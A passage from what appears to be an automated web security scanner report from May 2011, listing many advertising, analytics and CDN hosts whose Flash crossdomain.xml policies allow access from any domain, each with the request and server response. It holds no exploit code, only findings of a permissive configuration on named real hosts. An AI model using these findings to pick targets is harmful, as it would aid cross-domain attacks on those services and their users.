<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.2. http://1.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Mon, 02 May 2011 02:48:11 GMT
Expires: Mon, 02 May 2011 02:53:11 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.3. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sun, 01 May 2011 23:33:31 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.4. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 02 May 2011 02:20:09 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 02 May 2011 02:20:08 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

8.5. http://admeld.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

8.6. http://admonkey.dapper.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admonkey.dapper.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 02 May 2011 02:35:22 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Tue, 03 Aug 2010 09:20:10 GMT
ETag: "1b4b458-ca-48ce7d2dee680"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

8.7. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Mon, 02 May 2011 02:52:52 GMT
Date: Sun, 01 May 2011 02:52:52 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 84983

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

8.8. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 02 May 2011 23:34:41 GMT
Date: Sun, 01 May 2011 23:34:41 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

8.9. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205350000"
Last-Modified: Thu, 15 Jul 2010 14:49:10 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 02 May 2011 02:01:52 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.10. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


8.11. http://c.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Length: 107
Content-Type: text/xml
Last-Modified: Tue, 24 Feb 2009 17:22:30 GMT
Accept-Ranges: bytes
ETag: "ca58579a496c91:c8a"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: keep-alive

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.12. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 02 May 2011 02:10:39 GMT
Date: Mon, 02 May 2011 02:10:39 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

8.13. http://d1.openx.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "80468-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

8.14. http://dg.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dg.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 02 May 2011 02:04:37 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

8.15. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Mon, 02 May 2011 02:09:18 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


8.16. http://edge.aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:a52"
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Mon, 02 May 2011 02:25:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 02:25:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

8.17. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:07:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

8.18. http://l.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 06:42:04 GMT
Cache-Control: max-age=315360000
Expires: Wed, 28 Apr 2021 06:42:04 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:55 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 60671
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

8.19. http://loadm.exelator.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: loadm.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1405316268"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Mon, 02 May 2011 01:58:27 GMT
Server: HTTP server

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

8.20. http://loadus.exelator.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: loadus.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "2127011854"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

8.21. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:28:33 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.22. http://map.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 02 May 2011 02:35:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.23. http://metrics.washingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.washingtonpost.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:47 GMT
Server: Omniture DC/2.0.0
xserver: www65
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

8.24. http://n4403ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://n4403ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: n4403ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 02 May 2011 01:58:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.25. http://pix01.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix01.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix01.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 01 May 2011 23:34:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.26. http://pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:28 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

8.27. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 03 May 2011 01:57:46 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 02 May 2011 01:57:46 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

8.28. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 02 May 2011 02:10:38 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 02 May 2011 02:10:37 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

8.29. http://resources.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: resources.infolinks.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=14400
Content-Type: text/xml
Date: Mon, 02 May 2011 02:27:36 GMT
ETag: "8c8ace-52-493eb73b9d9c0"
Expires: Mon, 02 May 2011 06:27:36 GMT
Last-Modified: Sun, 31 Oct 2010 15:36:15 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 82
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

8.30. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 01 May 2011 03:34:26 GMT
Expires: Sun, 01 May 2011 03:34:10 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 72005
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.31. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 01:56:44 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

8.32. http://t.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:10 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "184c003-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=300, max=11
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

8.33. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "2320194-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
